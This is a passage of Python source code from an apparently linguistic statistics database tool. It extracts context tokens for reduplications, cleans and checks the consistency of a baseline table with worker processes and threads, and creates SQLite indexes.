if leftover_contextnumber <= len(current_sent) and leftover_contextnumber > 0:
temp_index = leftover_contextnumber-1
token_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
#p((temp_sent_index,temp_index, token_index_in_orig_t_elem), "sent_index,temp_index, token_index_in_orig_t_elem")
try:
#p("333")
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_index])
#info = text_elem[temp_sent_index][0][temp_index][1]
except:
#p("444")
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_index])
#p((item, info), c="b")
#info = [number_of_loops, temp_sent_index, leftover_contextnumber]
#item = current_sent[temp_index]
#info = text_elem[temp_sent_index][0][temp_index][1]
#p((col_name_context,item,info), c="r")
break
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
def _get_context_left_for_redu(self, input_dict, text_elem, mapping_redu, redu_free_text_container, sent_index,redu,stemmed_text_container,):
### context Left
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextL{}".format(context_number)
col_name_info = "context_infoL{}".format(context_number)
#while True:
temp_index = redu['index_in_redu_free'] - context_number
## if needed context_item in the current sent
if (temp_index) >= 0:
token_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
try:
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except:
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
#'start_index_in_orig'
#p((col_name_context,item, info), "item", c="m")
else: ## if needed context_item not in the current sent
leftover_contextnumber = context_number - redu['index_in_redu_free'] # left over times to go to the left
if not leftover_contextnumber: # sanity check: there must be at least one step left to go
raise Exception("WrongContextNumber. It should be >0")
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index - number_of_loops
if temp_sent_index < 0:
item = None #[number_of_loops, temp_sent_index, leftover_contextnumber]
info = None
break
last_sent = redu_free_text_container[temp_sent_index+1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber >= 0:
#item = current_sent[-leftover_contextnumber]
#p(leftover_contextnumber, "leftover_contextnumber")
#info = text_elem[temp_sent_index][0][-leftover_contextnumber][1]
#info = rle_for_repl_in_text_container[sent_index][start_index:start_index+redu['length']]
temp_index = -leftover_contextnumber
token_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
try:
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_index])
#info = text_elem[temp_sent_index][0][temp_index][1]
except:
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_index])
break
#text_elem[sent_index][0][redu['index_in_redu_free']][1]
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
###################Optimizators########################
# def get_streams_from_baseline(self,stream_number, max_scope=False,size_to_fetch=1, split_syntagma=False):
# row_num = self.statsdb.rownum("baseline")
# rows_pro_stream = row_num/stream_number
# streams = []
# num_of_getted_items = 0
# for i in range(stream_number):
# thread_name = "BSThread{}".format(i)
# # p((i,thread_name ), "get_streams_from_baseline")
# if i < (stream_number-1): # for gens in between
# gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=rows_pro_stream, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
# num_of_getted_items += rows_pro_stream
# streams.append((thread_name,LenGen(gen, rows_pro_stream)))
# else: # for the last generator
# gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=-1, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
# streams.append((thread_name,LenGen(gen, row_num-num_of_getted_items)))
# return streams
def get_streams_from_baseline(self,stream_number, max_scope=False,size_to_fetch=1, split_syntagma=False):
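# Splits the baseline table into stream_number roughly equal chunks. For each
# chunk a child Process runs intern_sender(), which pushes rows from the
# _baseline() generator through a Pipe in blocks of 10000 whenever the
# consumer requests more with "+". Returns a list of
# (thread_name, row_count, receiving_pipe_end, sender_process) tuples.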
row_num = self.statsdb.rownum("baseline")
rows_pro_stream = row_num/stream_number
streams = []
num_of_getted_items = 0
def intern_sender(pipe, gen, length, chunk_size= 10000):
#result = pipe.recv()
#sended_num = 0
#was_close = False
while True:
command = pipe.recv()
if command == "+":
i = 0
while i <= chunk_size:
try:
g = next(gen)
except StopIteration:
pipe.send(None)
break
#p(g, "SENDER", c="r")
#pipe.send(next(gen))
pipe.send(g)
i += 1
#sended_num += i
pipe.send(False)
else:
#was_close = True
#pipe.close()
break
pipe.send(None)
pipe.send(None)
for i in range(stream_number):
thread_name = "BSThread{}".format(i)
parent, child = Pipe()
# p((i,thread_name ), "get_streams_from_baseline")
if i < (stream_number-1): # for gens in between
gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=rows_pro_stream, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
sender = Process(target=intern_sender, args=(parent, gen, rows_pro_stream, 10000))
sender.start()
streams.append((thread_name,rows_pro_stream,child,sender))
#streams.append((thread_name,LenGen(gen, rows_pro_stream)))
num_of_getted_items += rows_pro_stream
else: # for the last generator
gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=-1, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
#streams.append((thread_name,LenGen(gen, row_num-num_of_getted_items)))
sender = Process(target=intern_sender, args=(parent, gen, row_num-num_of_getted_items, 10000))
sender.start()
#streams.append((thread_name,LenGen(intern_gen(-1, num_of_getted_items), row_num-num_of_getted_items)))
streams.append((thread_name,row_num-num_of_getted_items,child,sender))
return streams
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def convert_queue_to_list(self,inp_queue):
output_list = []
while True:
if inp_queue.empty():
break
else:
output_list.append(inp_queue.get())
#del inp_queue
#gc.collect()
return output_list
def clean_baseline_table(self,stream_number=1, min_row_pro_sream=1000, cpu_percent_to_get=50, adjust_to_cpu=True):
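# Removes baseline rows whose syntagma no longer matches any replication or
# reduplication entry. The baseline is split into streams (optionally adjusted
# to the available CPUs), one _clean_baseline_table() worker thread per stream
# collects the syntagmas to drop into a shared queue, and afterwards they are
# deleted in a single executemany() call.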
#p(self.statsdb.rownum("baseline"))
#print(self.statsdb.rownum("baseline"),"self.statsdb.rownum(baseline)")
#min_row_pro_sream= 10
if adjust_to_cpu:
stream_number= get_number_of_streams_adjust_cpu( min_row_pro_sream, self.statsdb.rownum("baseline"), stream_number, cpu_percent_to_get=cpu_percent_to_get)
if stream_number is None or stream_number==0:
#p((self._get_number_of_left_over_files(),self.counter_lazy_getted),"self._get_number_of_left_over_files()")
self.logger.error("StreamNumber is 0. Not generators could be returned.", exc_info=self._logger_traceback)
return []
#p(stream_number,"stream_number")
#print("111")
self._init_compution_variables()
#print("222")
streams= self.get_streams_from_baseline(stream_number, split_syntagma=False)
#p(len(streams),"streams")
#self._terminated.value = False
#print("333")
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB-Optimization") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
status_bar_threads_init = self._get_new_status_bar(len(streams), "ThreadsStarted", "threads")
#status_bar_current = self._get_new_status_bar(self.statsdb.rownum("baseline"), "{}:BaselineOptimization".format(thread_name), "syntagma")
#if self._status_bar:
self._threads_num = len(streams)
row_num_bevore = self.statsdb.rownum("baseline")
if self._threads_num>1:
if self._status_bar:
unit = "syntagma"
self.main_status_bar = self._get_new_status_bar(row_num_bevore, "AllThreadsTotalInsertions", unit)
self.main_status_bar.refresh()
else:
self.main_status_bar = False
syntagmas_to_delete_queue = Queue()
#p(len(syntagmas_to_delete_queue), "syntagmas_to_delete_queue")
for stream in streams:
reciever = stream[2]
sender = stream[3]
thread_name = stream[0]
length = stream[1]
#if not self._isrighttype(gen):
# self.logger.error("StatsBaselineCleanError: Given InpData not from right type. Please give an list or an generator.", exc_info=self._logger_traceback)
# return False
#p(gen)
#if self._status_bar:
thread_name = stream[0]
status_bar_current = self._get_new_status_bar(length, "{}:".format(thread_name), "syntagma") if self._status_bar else False
processThread = threading.Thread(target=self._clean_baseline_table, args=(reciever,sender,syntagmas_to_delete_queue, status_bar_current,thread_name), name=thread_name)
processThread.setDaemon(True)
processThread.start()
self.active_threads.append(processThread)
if self._status_bar:
status_bar_threads_init.update(incr=1)
#i+=1
time.sleep(1)
#for _t in self.active_threads:
# _t.join()
if not self._wait_till_all_threads_are_completed("Compute"):
return False
del self.active_threads
self.active_threads = []
gc.collect()
#row_num_bevore = self.statsdb.rownum("baseline")
##### delete syntagmas from baseline-table
qeary = "DELETE FROM baseline WHERE syntagma = ?;"
#p(len(syntagmas_to_delete_queue), "syntagmas_to_delete_queue")
syntagmas_to_delete_list = self.convert_queue_to_list(syntagmas_to_delete_queue)
del syntagmas_to_delete_queue
gc.collect()
#syntagmas_to_delete_queue = [ for _s in syntagmas_to_delete_queue if syntagmas_to_delete_queue.]
if syntagmas_to_delete_list:
self.statsdb.executemany(qeary,syntagmas_to_delete_list)
len_syntagmas_to_delete_list = len(syntagmas_to_delete_list)
del syntagmas_to_delete_list
gc.collect()
row_num_after = self.statsdb.rownum("baseline")
self.statsdb._commit(write_all_cash=True)
if self._status_bar:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Syntagmas: Bevore:'{}'; After:'{}'; Removed: '{}'.".format(row_num_bevore, row_num_after, row_num_bevore-row_num_after ) ), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#p(len(syntagmas_to_delete_list), "syntagmas_to_delete_list")
#syntagmas_to_delete_list = []
if (row_num_bevore-row_num_after) == len_syntagmas_to_delete_list:
if self._status_bar:
self.logger.info("Baseline-Table was cleaned.")
else:
self.logger.info("Baseline-Table was cleaned.")
return True
else:
return False
def _clean_baseline_table(self, pipe_reciever, sender,syntagmas_to_delete_queue,status_bar_current, thread_name="Thread0"):
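# Worker for clean_baseline_table(): requests baseline rows from its sender
# process over the pipe, builds WHERE statements for each syntagma and checks
# the "replications" and then the "reduplications" table; syntagmas without a
# single hit are put into syntagmas_to_delete_queue.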
try:
if not self._check_stats_db_should_exist():
return False
#return
### compute syntagmas to delete
minimum_columns = False
indexes = self.col_index_min if minimum_columns else self.col_index_orig
#indexes = self.col_index_min
case = "" if self._case_sensitiv else " COLLATE NOCASE "
#for baseline_container in gen:
pipe_reciever.send("+")
while True:
#try:
baseline_container = pipe_reciever.recv()
#p(baseline_container, "RECIEVER"+thread_name, )
#except IOError:
# break
if not baseline_container:
if baseline_container is False:
pipe_reciever.send("+")
continue
elif baseline_container is None:
sender.terminate()
del sender
pipe_reciever.close()
break
#baseline_container = pipe_reciever.recv()
else:
continue
was_found = False
if self._status_bar:
status_bar_current.update(incr=1)
if self.main_status_bar:
self.main_status_bar.update(incr=1)
#self._check_termination(thread_name=thread_name)
inp_syntagma_splitted = baseline_container[0].split(self._baseline_delimiter)
scope = len(inp_syntagma_splitted)
syntagma_type = "lexem"
where = self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name,
with_context=True,syntagma_type=syntagma_type)
collected_w = ()
for w in where:
#p(w, "w")
#_threads_cursors["Thread0"].execute("SELECT id FROM replications WHERE {} ;".format(" AND ".join(w)))
if w:
current_reps = self.statsdb._threads_cursors[thread_name].execute(u"SELECT id FROM replications WHERE {} {};".format(u" AND ".join(w), case)).fetchone()
#current_reps = self.statsdb.getone("replications", where=w,connector_where="AND",case_sensitiv=self._case_sensitiv,thread_name=thread_name)
#tuple(self._rep_getter_from_db("repl",inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name, for_optimization=True))
if current_reps:
#p("REPL was found")
was_found = True
break
collected_w += (w,)
else:
self.logger.error("No where Statements was given. Probably an ImplementationsError.")
return False
#else:
## Step 2: If no one repls was found, than search for redus
if was_found:
continue
for w in collected_w:
#collected_w.append(w)
if w:
current_reps = self.statsdb._threads_cursors[thread_name].execute(u"SELECT id FROM reduplications WHERE {} {};".format(u" AND ".join(w), case)).fetchone()
#current_reps = current_reps = self.statsdb.getone("reduplications", where=w,connector_where="AND",case_sensitiv=self._case_sensitiv,thread_name=thread_name)
#tuple(self._rep_getter_from_db("redu",inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name, for_optimization=True))
if current_reps:
#p("REDU was found")
was_found = True
break
else:
self.logger.error("No where Statements was given. Probably an ImplementationsError.")
return False
if was_found:
continue
#syntagmas_to_delete_queue.append((baseline_container[0],))
syntagmas_to_delete_queue.put((baseline_container[0],))
self.threads_status_bucket.put({"name":thread_name, "status":"done"})
return True
except Exception as e:
print_exc_plus() if self._ext_tb else ""
msg = "_CleanBaselineTableError: See Exception: '{}'. ".format(e)
self.logger.error(msg, exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
self._terminated.value = True
self.statsdb.rollback()
return False
def _check_baseline_consistency(self):
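# Verifies that every baseline row is internally consistent: the number of
# tokens in the 'syntagma' and in the 'stemmed' column must both equal the
# stored 'scope'. Returns True only if no invalid entry was found.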
try:
#p(baseline, "baseline")
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("Baseline-ConsistencyTest") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
normalized_word_tag = db_helper.tag_normalized_word
consistency = True
# counter_inconsistency = 0
###############################
num = self.statsdb.rownum("baseline")
if self._status_bar:
status_bar_current = self._get_new_status_bar(num, "BaselineCheck:", "syntagma")
#indexes = self.col_index_min if minimum_columns else self.col_index_orig
indexes = self.col_index_orig
ix_syntagma = indexes["baseline"]["syntagma"]
ix_scope = indexes["baseline"]["scope"]
ix_stemmed = indexes["baseline"]["stemmed"]
for r in self.statsdb.lazyget("baseline"):
if self._status_bar:
status_bar_current.update(incr=1)
syntagma = r[ix_syntagma].split(self._baseline_delimiter)
stemmed = r[ix_stemmed].split(self._baseline_delimiter)
scope = r[ix_scope]
if (len(syntagma) != scope) or (len(stemmed) != scope):
#p((len(syntagma) != len(stemmed) != 10),c="r")
consistency = False
self.logger.error("BaselineInvalidEntry: syntagma : '{}'; stemmed: '{}'; scope: '{}'; ".format(syntagma, stemmed, scope))
if self._status_bar:
if status_bar_current.count != status_bar_current.total:
status_bar_current.count = status_bar_current.total
status_bar_current.refresh()
if consistency:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Baseline is consistent."), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
else:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("ERROR!!! Baseline is INCONSISTENT."), "", counter_format=self.status_bars_manager.term.bold_white_on_red('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
if consistency:
return True
else:
#inconsistent_words
#inconsistent_words = inconsistent_words if self._log_content else ":HIDDED_CONTENT:"
self.logger.error("StatsDB is inconsistence. Try to set other 'baseline_delimiter' (used now: '{}') And if after that action your Baseline still stay broken than it could be an ImplementationsError. If you have this Problem, please contact Egor Savin (egor@savin.berlin).".format(self._baseline_delimiter))
return False
except Exception as e:
self.logger.error("ConsistencyTestError: '{}' ".format(repr(e)))
return False
def _check_statsdb_consistency(self):
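# Cross-table consistency check: every distinct normalized word from the
# "replications" and "reduplications" tables must also occur as a scope-1
# syntagma in the baseline table. Words without a baseline entry are logged
# and cause the check to fail.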
try:
baseline = self.statsdb.lazyget("baseline", columns="syntagma", where="scope=1")
if baseline:
baseline = set([b[0] for b in baseline if b])
else:
self.logger.error("BaselineTableErorr: No one syntagma with scope 1 was found. It could mean, that this StatsDB is corrupt or inconsistent")
return False
#p(baseline, "baseline")
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB-ConsistencyTest") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
normalized_word_tag = db_helper.tag_normalized_word
consistency = True
# counter_inconsistency = 0
inconsistent_words = []
##############################
########## REPLS ###########
###############################
num_repl = self.statsdb.execute("SELECT count(DISTINCT {}) FROM replications;".format(normalized_word_tag))
if num_repl:
num_repl = num_repl.fetchone()[0]
else:
self.logger.error("ERROR by getting ReplRowNumber. consistencyTest is failed.")
return False
if self._status_bar:
status_bar_repl = self._get_new_status_bar(num_repl, "ReplsCheck:", "syntagma")
for r in self.statsdb.getall("replications", columns=normalized_word_tag, distinct=True):
if self._status_bar:
status_bar_repl.update(incr=1)
#p(r[0],"r[0]")
if r[0] not in baseline:
consistency = False
# counter_inconsistency += 1
try:
word = r[0].decode()
except Exception:
word = r[0]
inconsistent_words.append(word)
self.logger.debug(u"StatsDB is inconsistent. No baseline entry exists for the word '{}'.".format(word))
##############################
########## REDUS ###########
##############################
num_redu = self.statsdb.execute("SELECT count(DISTINCT {}) FROM reduplications;".format(normalized_word_tag))
if num_redu:
num_redu = num_redu.fetchone()[0]
else:
self.logger.error("ERROR by getting ReduRowNumber. consistencyTest is failed.")
return False
#p("555")
if self._status_bar:
status_bar_redu = self._get_new_status_bar(num_redu, "RedusCheck:", "syntagma")
for r in self.statsdb.getall("reduplications", columns=normalized_word_tag, distinct=True):
if self._status_bar:
status_bar_redu.update(incr=1)
#p(r[0],"r[0]")
if r[0] not in baseline:
consistency = False
# counter_inconsistency += 1
try:
word = r[0].decode()
except Exception:
word = r[0]
inconsistent_words.append(word)
self.logger.debug(u"StatsDB is inconsistent. No baseline entry exists for the word '{}'.".format(word))
if self._status_bar:
#p((num_repl, num_redu))
#p((status_bar_repl.count, status_bar_repl.total, status_bar_redu.count, status_bar_redu.total))
if status_bar_repl.count != status_bar_repl.total:
status_bar_repl.count = status_bar_repl.total
status_bar_repl.refresh()
if status_bar_redu.count != status_bar_redu.total:
status_bar_redu.count = status_bar_redu.total
status_bar_redu.refresh()
if consistency:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB is consistent."), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
else:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("ERROR!!! StatsDB is INCONSISTENT."), "", counter_format=self.status_bars_manager.term.bold_white_on_red('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
if consistency:
return True
else:
#inconsistent_words
inconsistent_words = inconsistent_words if self._log_content else ":HIDDED_CONTENT:"
self.logger.error("StatsDB is inconsistence. '{}'-words don't have any entry in BaselineTable. It could be an ImplementationsError. If you have this Problem, please contact Egor Savin (egor@savin.berlin).\n InconsistentWords: '{}'. ".format(len(inconsistent_words), inconsistent_words))
return False
except Exception as e:
self.logger.error("ConsistencyTestError: '{}' ".format(repr(e)))
return False
def optimize_db(self,stream_number=1,thread_name="Thread0",optimized_for_long_syntagmas=False,min_row_pro_sream=1000, cpu_percent_to_get=50, adjust_to_cpu=True):
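# Freezes the StatsDB: cleans the baseline table and, on success, sets the
# "db_frozen" attribute in the DB, reloads the internal attributes and commits.
# Does nothing if the DB was already optimized.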
if not self._db_frozen:
#print("START BL CLEAN")
if self.clean_baseline_table(stream_number=stream_number,min_row_pro_sream=min_row_pro_sream, cpu_percent_to_get=cpu_percent_to_get, adjust_to_cpu=adjust_to_cpu):
#print("END BL CLEAN")
#p(self._db_frozen,"self._db_frozen")
self.statsdb.update_attr("db_frozen", True)
self.set_all_intern_attributes_from_db()
self.statsdb._commit(write_all_cash=True)
if self._db_frozen:
self.logger.info("Current StatsDB was successfully optimized.")
return True
else:
return False
else:
self.logger.info("OptimizationError: StatsDB wasn't space optimized.")
return False
else:
self.logger.warning("Current StatsDB was already optimized!")
return False
def _get_number_created_indexes(self):
all_indexes = self.statsdb._get_indexes_from_db()
created_indexes_raw = [item for item in all_indexes if "autoindex" not in item[1] ]
return len(created_indexes_raw)
def _get_created_indexes(self):
all_indexes = self.statsdb._get_indexes_from_db()
#p(all_indexes, "all_indexes")
pattern = re.compile(r"create.+index(.+)on\s.*\((.+)\)", re.IGNORECASE)
pattern_index_columns = re.compile(r"\((.+)\)")
created_indexes_raw = [(item[2],pattern.findall(item[4])[0]) for item in all_indexes if "autoindex" not in item[1]]
created_indexes = defaultdict(list)
for index in created_indexes_raw:
created_indexes[index[0]].append((index[1][0].strip(" ").strip("'").strip('"'),index[1][1].strip("'").strip('"').split(",")))
return created_indexes
def _drop_created_indexes(self, table_name="*"):
indexes = self._get_created_indexes()
if table_name == "*":
for table_name, data in indexes.iteritems():
for created_index_container in data:
self.statsdb.execute("DROP INDEX {};".format(created_index_container[0]))
else:
if table_name not in self.statsdb.tables():
self.logger.error("'{}'-Tables not exist in the given Stats-DB. ".format(table_name))
return False
def _get_column_pairs_for_indexes(self,scope=False,optimized_for_long_syntagmas=False):
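# Computes the column combinations that should be indexed for "lexem" and
# "pos" syntagmas: for every scope up to the configured limit and every
# position of the target word it lists the matching contextL*/normalized_word/
# contextR* (or context_infoL*/pos/context_infoR*) columns.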
columns_to_index = defaultdict(list)
if optimized_for_long_syntagmas:
scope = self.baseline_ngramm_lenght
#if scope > 5:
# scope == 4
#pass
else:
scope = scope if scope else self._min_scope_for_indexes
#scope = 0
if scope > self.baseline_ngramm_lenght:
scope = self.baseline_ngramm_lenght
for syntagma_type in ["lexem","pos"]:
normalized_word_tag_name = "normalized_word" if syntagma_type == "lexem" else "pos"
context_tag_name_r = "contextR" if syntagma_type == "lexem" else "context_infoR"
context_tag_name_l = "contextL" if syntagma_type == "lexem" else "context_infoL"
for step in xrange(scope+1):
for token_index in xrange(step):
temp_columns = []
for i in xrange(step):
if i < token_index:
col_name = u"{}{}".format(context_tag_name_l,token_index-i)
temp_columns.append(col_name)
elif i == token_index:
col_name = u"{}".format(normalized_word_tag_name)
temp_columns.append(col_name)
elif i > token_index:
col_name = u"{}{}".format(context_tag_name_r,i-token_index)
temp_columns.append(col_name)
columns_to_index[syntagma_type].append(temp_columns)
return columns_to_index
def _get_biggest_column_pairs_for_indexes(self, raw_columns_to_index):
#p(raw_columns_to_index, "raw_columns_to_index")
for syntagma_type, column_pairs in raw_columns_to_index.iteritems():
temp_pairs_for_current_syntagma_type = {}
for column_pair in column_pairs:
if column_pair[0] not in temp_pairs_for_current_syntagma_type:
temp_pairs_for_current_syntagma_type[column_pair[0]] = column_pair
else:
if len(temp_pairs_for_current_syntagma_type[column_pair[0]]) < len(column_pair):
temp_pairs_for_current_syntagma_type[column_pair[0]] = column_pair
raw_columns_to_index[syntagma_type] = temp_pairs_for_current_syntagma_type.values()
#p(raw_columns_to_index, "raw_columns_to_index")
return raw_columns_to_index
def _get_not_exists_indexes(self,raw_columns_to_index,tables_to_index,created_indexes):
indexes_optimizes = defaultdict(list,{table_name:[col[1] for col in data] for table_name, data in created_indexes.iteritems() })
columns_to_index = defaultdict(lambda:defaultdict(list))
for table_name in tables_to_index:
for syntagma_type, data in raw_columns_to_index.iteritems():
for columns_bunch in data:
if columns_bunch not in indexes_optimizes[table_name]:
columns_to_index[table_name][syntagma_type].append(columns_bunch)
#p(columns_to_index, "columns_to_index")
return columns_to_index
def create_additional_indexes(self,thread_name="Thread0", scope=False, optimized_for_long_syntagmas=False):
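# Creates the missing non-unique indexes on the "replications" and
# "reduplications" tables: it computes the desired column combinations, keeps
# only the widest combination per leading column, drops those that already
# exist in the DB and issues a CREATE INDEX statement for each remaining one.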
tables_to_index = ["replications", "reduplications"]
### Step 0: Init Status Bar
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB-Indexing") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
#status_bar_current = self._get_new_status_bar(self.statsdb.rownum("baseline"), "BaselineOptimization", "syntagma")
### compute syntagmas to delete
#### Step 1: Extract exist indexes
indexes = self._get_created_indexes()
number_indexes_bevore = self._get_number_created_indexes()
#qeary = "CREATE UNIQUE INDEX {} ON {} ({});"
#qeary = "CREATE UNIQUE INDEX IF NOT EXISTS {} ON {} ({});"
qeary = "CREATE INDEX {} ON {} ({});"
### Step 2: Compute needed indexes to create
raw_columns_to_index = self._get_column_pairs_for_indexes(scope=scope,optimized_for_long_syntagmas=optimized_for_long_syntagmas)
raw_columns_to_index = self._get_biggest_column_pairs_for_indexes(raw_columns_to_index)
#p(raw_columns_to_index, "raw_columns_to_index")
#### Step3: Delete those columns_pairs, which exists in the StatsDB
columns_to_index = self._get_not_exists_indexes(raw_columns_to_index, tables_to_index,indexes)
number_to_create = len([col for table_name, data in columns_to_index.iteritems() for syntagma_type, columns in data.iteritems() for col in columns ])
### Step 4: Delete those indexes from StatsDB, which will be not needed after creation a new indexes
#index_names_to_delete_from_db = self._get_indexes_which_are_smaller_than_new_one(indexes, columns_to_index)
### Step 5: Create Indexes
if self._status_bar:
status_bar_current = self._get_new_status_bar(number_to_create, "IndexCreation:", "index")
i = 0
for table_name, data in columns_to_index.iteritems():
for syntagma_type, columns in data.iteritems():
for columns_bunch in columns:
if self._status_bar:
status_bar_current.update(incr=1)
i += 1
#p(columns_bunch, "columns_bunch")
index_name = "ix_{}_{}_scope_{}_nr_{}".format(table_name[:4],syntagma_type, len(columns_bunch),i)
prepared_qeary = qeary.format(index_name, table_name, ",".join(columns_bunch))
#p(prepared_qeary, "prepared_qeary")
self.statsdb.execute(prepared_qeary)
self.statsdb._commit(write_all_cash=True)
### Step 6: Print Status
if self._status_bar:
#bevore = i
#after = self.statsdb.rownum("baseline")
number_indexes_after = self._get_number_created_indexes()
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Indexes: NumBevore:'{}'; NumAfter:'{}'; WasCreated: '{}'.".format(number_indexes_bevore, number_indexes_after, number_indexes_after-number_indexes_bevore ) ), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#print "\n"
return number_to_create
###########################Other Methods##################
def exist(self):
return True if self.statsdb else False
def db(self):
if not self._check_stats_db_should_exist():
return False
self.logger.debug("DBConnection was passed.")
return self.statsdb
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################INTERN########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
#######################Status Bars##############
def _get_new_status_bar(self, total, desc, unit, counter_format=False):
#counter_format
try:
self.status_bars_manager
except AttributeError:
self.status_bars_manager = self._get_status_bars_manager()
if counter_format:
counter = self.status_bars_manager.counter(total=total, desc=desc, unit=unit, leave=True, counter_format=counter_format)
else:
counter = self.status_bars_manager.counter(total=total, desc=desc, unit=unit, leave=True)
return counter
def _get_status_bars_manager(self):
config_status_bar = {'stream': sys.stdout,
'useCounter': True,
"set_scroll": True,
"resize_lock": True
}
enableCounter_status_bar = config_status_bar['useCounter'] and config_status_bar['stream'].isatty()
return enlighten.Manager(stream=config_status_bar['stream'], enabled=enableCounter_status_bar, set_scroll=config_status_bar['set_scroll'], resize_lock=config_status_bar['resize_lock'])
def _status_bars(self):
if self.status_bars_manager:
return self.status_bars_manager.counters
else:
self.logger.error("No activ Status Bar Managers was found.", exc_info=self._logger_traceback)
return False
#################################
def _check_db_should_be_an_stats(self):
if self.statsdb.typ() != "stats":
self.logger.error("No active DB was found. You need to connect or initialize a DB first, before you can make any operation on the DB.", exc_info=self._logger_traceback)
return False
else:
return True
def _wait_till_all_threads_are_completed(self, waitername, sec_to_wait=1, sec_to_log = 15):
time_counter = sec_to_log
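# Poll until every active thread has reported success, or any thread has reported a failure/termination.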
while not ( (len(self.threads_success_exit) >= len(self.active_threads)) or (len(self.threads_unsuccess_exit) != 0)):
#while len(self.threads_unsuccess_exit) == 0
#p(((len(self.threads_success_exit) <= len(self.active_threads))), "(len(self.threads_success_exit) < len(self.active_threads))")
#p((len(self.threads_unsuccess_exit) == 0), "(len(self.threads_unsuccess_exit) == 0)")
if time_counter >= sec_to_log:
time_counter = 0
